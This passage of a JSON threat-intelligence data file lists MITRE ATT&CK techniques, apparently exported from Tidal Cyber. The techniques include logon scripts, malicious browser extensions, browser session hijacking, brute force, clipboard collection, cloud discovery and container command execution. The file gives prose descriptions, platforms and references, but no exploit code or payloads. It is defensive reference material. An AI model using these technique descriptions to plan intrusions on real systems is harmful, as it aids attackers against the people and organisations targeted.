"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "17b97c19-b986-4653-850a-44aee9aaaba1",
"value": "Boot or Logon Autostart Execution"
},
{
"description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.<sup>[[Mandiant APT29 Eye Spy Email Nov 22](https://app.tidalcyber.com/references/452ca091-42b1-5bef-8a01-921c1f46bbee)]</sup><sup>[[Anomali Rocke March 2019](https://app.tidalcyber.com/references/31051c8a-b523-4b8e-b834-2168c59e783b)]</sup> Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "c51f799b-7305-43db-8d3b-657965cad68a",
"value": "Boot or Logon Initialization Scripts"
},
{
"description": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.<sup>[[Wikipedia Browser Extension](https://app.tidalcyber.com/references/52aef082-3f8e-41b4-af95-6631ce4c9e91)]</sup><sup>[[Chrome Extensions Definition](https://app.tidalcyber.com/references/fe00cee9-54d9-4775-86da-b7db73295bf7)]</sup>\n\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores, so it may not be difficult for malicious extensions to defeat automated scanners.<sup>[[Malicious Chrome Extension Numbers](https://app.tidalcyber.com/references/f34fcf1f-370e-4b6e-9cc4-7ee4075faf6e)]</sup> Depending on the browser, adversaries may also manipulate an extension's update URL to install updates from an adversary-controlled server or manipulate the mobile configuration file to silently install additional extensions.\n\nPrior to macOS 11, adversaries could silently install browser extensions via the command line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the <code>profiles</code> tool can no longer install configuration profiles; however, <code>.mobileconfig</code> files can still be planted and installed with user interaction.<sup>[[xorrior chrome extensions macOS](https://app.tidalcyber.com/references/84bfd3a1-bda2-4821-ac52-6af8515e5879)]</sup>\n\nOnce the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.<sup>[[Chrome Extension Crypto Miner](https://app.tidalcyber.com/references/ae28f530-40da-451e-89b8-b472340c3e0a)]</sup><sup>[[ICEBRG Chrome Extensions](https://app.tidalcyber.com/references/459bfd4a-7a9b-4d65-b574-acb221428dad)]</sup><sup>[[Banker Google Chrome Extension Steals Creds](https://app.tidalcyber.com/references/93f37adc-d060-4b35-9a4d-62d2ad61cdf3)]</sup><sup>[[Catch All Chrome Extension](https://app.tidalcyber.com/references/eddd2ea8-89c1-40f9-b6e3-37cbdebd210e)]</sup>\n\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://app.tidalcyber.com/tactics/94ffe549-1c29-438d-9c7f-e27f7acee0bb).<sup>[[Stantinko Botnet](https://app.tidalcyber.com/references/d81e0274-76f4-43ce-b829-69f761e280dc)]</sup><sup>[[Chrome Extension C2 Malware](https://app.tidalcyber.com/references/b0fdf9c7-614b-4269-ba3e-7d8b02aa8502)]</sup> Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://app.tidalcyber.com/tactics/8e29c6c9-0c10-4bb0-827d-ff0ab8922726).<sup>[[Browers FriarFox](https://app.tidalcyber.com/references/3fe79fc8-c86d-57ad-961f-30fddd0e5f62)]</sup><sup>[[Browser Adrozek](https://app.tidalcyber.com/references/48afb730-b5e1-5a85-bb60-9ef9b536e397)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "040804f6-6a87-4011-8716-66682bc16ed4",
"value": "Browser Extensions"
},
{
"description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.<sup>[[Kaspersky Autofill](https://app.tidalcyber.com/references/561ff84d-17ce-511c-af0c-059310f3c129)]</sup>\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://app.tidalcyber.com/technique/838c5038-91e7-4648-925e-a142c8c10853) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).<sup>[[Chrome Roaming Profiles](https://app.tidalcyber.com/references/cf0bb77d-c7f7-515b-9217-ba9120cdddec)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "f1af5c8b-3210-4788-a873-97b1518bb43a",
"value": "Browser Information Discovery"
},
{
"description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user behaviors, and intercept information as part of various browser session hijacking techniques.<sup>[[Wikipedia Man in the Browser](https://app.tidalcyber.com/references/f8975da7-4c50-4b3b-8ecb-c99c9b3bc20c)]</sup>\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user, then uses the browser as a way to pivot into an authenticated intranet.<sup>[[Cobalt Strike Browser Pivot](https://app.tidalcyber.com/references/0c1dd453-7281-4ee4-9c8f-bdc401cf48d7)]</sup><sup>[[ICEBRG Chrome Extensions](https://app.tidalcyber.com/references/459bfd4a-7a9b-4d65-b574-acb221428dad)]</sup> Executing browser-based behaviors such as pivoting may require specific process permissions, such as <code>SeDebugPrivilege</code> and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened, and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://app.tidalcyber.com/technique/8ac6952d-5add-4cbc-ad39-44943ed3459b) or webmail, that is accessible through the browser and for which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.<sup>[[cobaltstrike manual](https://app.tidalcyber.com/references/43277d05-0aa4-4cee-ac41-6f03a49851a9)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "b57c5554-5a46-42cd-be7e-4206f79ef424",
"value": "Browser Session Hijacking"
},
{
"description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.<sup>[[TrendMicro Pawn Storm Dec 2020](https://app.tidalcyber.com/references/3bc249cd-f29a-4a74-a179-a6860e43683f)]</sup> Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.<sup>[[Dragos Crashoverride 2018](https://app.tidalcyber.com/references/d14442d5-2557-4a92-9a29-b15a20752f56)]</sup> Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.\n\nBrute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), [Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3), or [Password Policy Discovery](https://app.tidalcyber.com/technique/2bf2e498-99c8-4e36-ad4b-e675d95ac925). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) as part of Initial Access.",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "c16eef78-232e-47a2-98e9-046ec075b13c",
"value": "Brute Force"
},
{
"description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.<sup>[[Docker Build Image](https://app.tidalcyber.com/references/ee708b64-57f3-4b47-af05-1e26b698c21f)]</sup>\n\nAn adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://app.tidalcyber.com/technique/2618638c-f6bd-4840-a297-c45076e094a9) using that custom image.<sup>[[Aqua Build Images on Hosts](https://app.tidalcyber.com/references/efd64f41-13cc-4b2b-864c-4d2352cdadcd)]</sup><sup>[[Aqua Security Cloud Native Threat Report June 2021](https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)]</sup> If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ",
"meta": {
"platforms": [
"Containers"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "49749e13-48ed-49fc-82d1-13ae13b457c1",
"value": "Build Image on Host"
},
{
"description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.<sup>[[MSDN Clipboard](https://app.tidalcyber.com/references/2c1b2d58-a5dc-4aee-8bdb-129a81c10408)]</sup><sup>[[clip_win_server](https://app.tidalcyber.com/references/8a961fa1-def0-5efe-8599-62e884d4ea22)]</sup><sup>[[CISA_AA21_200B](https://app.tidalcyber.com/references/633c6045-8990-58ae-85f0-00139aa9a091)]</sup> Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243)).<sup>[[mining_ruby_reversinglabs](https://app.tidalcyber.com/references/ca2074d8-330b-544e-806f-ddee7b702631)]</sup>\n\nmacOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.<sup>[[Operating with EmPyre](https://app.tidalcyber.com/references/459a4ad5-0e28-4bfc-a73e-b9dd516d516f)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "e8f90b73-2e59-4643-a274-78b85b8d9f88",
"value": "Clipboard Data"
},
{
"description": "Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. <sup>[[AWS Systems Manager Run Command](https://app.tidalcyber.com/references/ef66f17b-6a5b-5eb8-83de-943e2bddd114)]</sup><sup>[[Microsoft Run Command](https://app.tidalcyber.com/references/4f2e6adb-6e3d-5f1f-b873-4b99797f2bfa)]</sup>\n\nIf an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) to execute commands in connected virtual machines.<sup>[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]</sup>",
"meta": {
"platforms": [
"IaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "944a7b91-c58e-567d-9e2c-515b93713c50",
"value": "Cloud Administration Command"
},
{
"description": "An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.<sup>[[Amazon Describe Instance](https://app.tidalcyber.com/references/c0b6a8a4-0d94-414d-b5ab-cf5485240dee)]</sup><sup>[[Amazon Describe Instances API](https://app.tidalcyber.com/references/95629746-43d2-4f41-87da-4bd44a43ef4a)]</sup><sup>[[AWS Get Public Access Block](https://app.tidalcyber.com/references/f2887980-569a-4bc2-949e-bd8ff266c43c)]</sup><sup>[[AWS Head Bucket](https://app.tidalcyber.com/references/1388a78e-9f86-4927-a619-e0fcbac5b7a1)]</sup> Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project,<sup>[[Google Compute Instances](https://app.tidalcyber.com/references/ae09e791-a00c-487b-b0e5-7768df0679a3)]</sup> and Azure's CLI command <code>az vm list</code> lists details of virtual machines.<sup>[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)]</sup> In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://app.tidalcyber.com/technique/a0e40412-cbfb-477b-87fc-40f2c84d26be).<sup>[[Malwarebytes OSINT Leaky Buckets - Hioureas](https://app.tidalcyber.com/references/67ebcf71-828e-4202-b842-f071140883f8)]</sup>\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup> The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup> An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries may also use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources.<sup>[[AWS Describe DB Instances](https://app.tidalcyber.com/references/85bda17d-7b7c-4d0e-a0d2-2adb5f0a6b82)]</sup> Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://app.tidalcyber.com/technique/5d0a3722-52b6-4968-a367-7ca6bc9a33fc), this technique focuses on the discovery of components of the provided services rather than the services themselves.",
"meta": {
"platforms": [
"IaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "fd346e4e-b22f-4cae-bc24-946d7b14b5e1",
"value": "Cloud Infrastructure Discovery"
},
{
"description": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.<sup>[[Google Command Center Dashboard](https://app.tidalcyber.com/references/a470fe2a-40ce-4060-8dfc-2cdb56bbc18b)]</sup>\n\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Office 365",
"SaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "315ce434-ad6d-4dae-a1dd-6db944a44422",
"value": "Cloud Service Dashboard"
},
{
"description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ between platform-as-a-service (PaaS), infrastructure-as-a-service (IaaS), and software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.<sup>[[Azure - Resource Manager API](https://app.tidalcyber.com/references/223cc020-e88a-4236-9c34-64fe606a1729)]</sup><sup>[[Azure AD Graph API](https://app.tidalcyber.com/references/fed0fef5-e366-4e24-9554-0599744cd1c6)]</sup>\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.<sup>[[Azure - Stormspotter](https://app.tidalcyber.com/references/42383ed1-9705-4313-8068-28a22a23f50e)]</sup><sup>[[GitHub Pacu](https://app.tidalcyber.com/references/bda43b1b-ea8d-4371-9984-6d8a7cc24965)]</sup>\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6) or [Disable or Modify Cloud Logs](https://app.tidalcyber.com/technique/6824cdb3-a4c5-45a8-a3d5-5a5afd347214).",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Office 365",
"SaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "5d0a3722-52b6-4968-a367-7ca6bc9a33fc",
"value": "Cloud Service Discovery"
},
{
"description": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://app.tidalcyber.com/technique/fd346e4e-b22f-4cae-bc24-946d7b14b5e1)) adversaries may access the contents/objects stored in cloud infrastructure.\n\nCloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS<sup>[[ListObjectsV2](https://app.tidalcyber.com/references/727c2077-f922-4314-908a-356c42564181)]</sup> and List Blobs in Azure.<sup>[[List Blobs](https://app.tidalcyber.com/references/f9aa697a-83dd-4bae-bc11-006be51ce477)]</sup>",
"meta": {
"platforms": [
"IaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "92761d92-a288-4407-a112-bb2720f07d07",
"value": "Cloud Storage Object Discovery"
},
{
"description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities; for example, macOS and Linux distributions include some flavor of [Unix Shell](https://app.tidalcyber.com/technique/3eafcd8b-0cb8-4d23-8785-3f80a3c897c7) while Windows installations include the [Windows Command Shell](https://app.tidalcyber.com/technique/be095bcc-4769-4010-b2db-3033d01efdbe) and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde).\n\nThere are also cross-platform interpreters such as [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65), as well as those commonly associated with client applications such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) and [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://app.tidalcyber.com/tactics/586a5b49-c566-4a57-beb4-e7c667f9c34c) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) in order to achieve remote Execution.<sup>[[Powershell Remote Commands](https://app.tidalcyber.com/references/24c526e1-7199-45ca-99b4-75e75c7041cd)]</sup><sup>[[Cisco IOS Software Integrity Assurance - Command History](https://app.tidalcyber.com/references/dbca06dd-1184-4d52-9ee8-b059e368033c)]</sup><sup>[[Remote Shell Execution in Python](https://app.tidalcyber.com/references/4ea54256-42f9-4b35-8f9e-e595ab9be9ce)]</sup>",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "a2184d53-63b1-4c40-81ed-da799080c36c",
"value": "Command and Scripting Interpreter"
},
{
"description": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.<sup>[[ESET Sednit USBStealer 2014](https://app.tidalcyber.com/references/8673f7fc-5b23-432a-a2d8-700ece46bd0f)]</sup> Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://app.tidalcyber.com/technique/6a7ab25e-49ed-4cd3-b199-5d80b728b416). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "0783c499-1564-4062-addc-f1ff86ef4e59",
"value": "Communication Through Removable Media"
},
{
"description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.<sup>[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)]</sup><sup>[[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)]</sup> Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "c6374cbe-799a-4648-b1e2-2a66bb42d3f3",
"value": "Compromise Accounts"
},
{
"description": "Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.\n\nAdversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.\n\nAn adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)<sup>[[Unit42 Banking Trojans Hooking 2022](https://app.tidalcyber.com/references/411c3df4-08e6-518a-953d-19988b663dc4)]</sup> prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.<sup>[[ESET FontOnLake Analysis 2021](https://app.tidalcyber.com/references/dbcced87-91ee-514f-98c8-29a85d967384)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "05435e33-05fe-4a41-b8e4-694d45eb9147",
"value": "Compromise Host Software Binary"
},
{
"description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure, an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[ICANNDomainNameHijacking](https://app.tidalcyber.com/references/96c5ec6c-d53d-49c3-bca1-0b6abe0080e6)]</sup><sup>[[Talos DNSpionage Nov 2018](https://app.tidalcyber.com/references/d597ad7d-f808-4289-b42a-79807248c2d6)]</sup><sup>[[FireEye EPS Awakens Part 2](https://app.tidalcyber.com/references/7fd58ef5-a0b7-40b6-8771-ca5e87740965)]</sup> Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58)) to further blend in and support staged information gathering and/or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns.<sup>[[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)]</sup> Additionally, adversaries may also compromise infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) and/or proxyware services.<sup>[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)]</sup><sup>[[Sysdig Proxyjacking](https://app.tidalcyber.com/references/26562be2-cab6-5867-9a43-d8a59c663596)]</sup>\n\nBy using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.<sup>[[NSA NCSC Turla OilRig](https://app.tidalcyber.com/references/3e86a807-5188-4278-9a58-babd23b86410)]</sup>",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "c12d81d3-abe4-43d7-8a65-f4b3150e722d",
"value": "Compromise Infrastructure"
},
{
"description": "Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.<sup>[[Docker Daemon CLI](https://app.tidalcyber.com/references/ea86eae4-6ad4-4d79-9dd3-dd965a7feb5c)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup><sup>[[Kubernetes Kubelet](https://app.tidalcyber.com/references/57527fb9-d076-4ce1-afb5-e7bdb9c9d74c)]</sup>\n\nIn Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as <code>docker exec</code> to execute a command within a running container.<sup>[[Docker Entrypoint](https://app.tidalcyber.com/references/c80ad3fd-d7fc-4a7a-8565-da3feaa4a915)]</sup><sup>[[Docker Exec](https://app.tidalcyber.com/references/5f1ace27-6584-4585-98de-52cb71d419c1)]</sup> In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as <code>kubectl exec</code>.<sup>[[Kubectl Exec Get Shell](https://app.tidalcyber.com/references/ffb9c0ca-533f-4911-8c0c-a2653410a76d)]</sup>",
"meta": {
"platforms": [
"Containers"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "0b9609dd-9f19-4747-ba6e-421b6b7ff03f",
"value": "Container Administration Command"
},
{
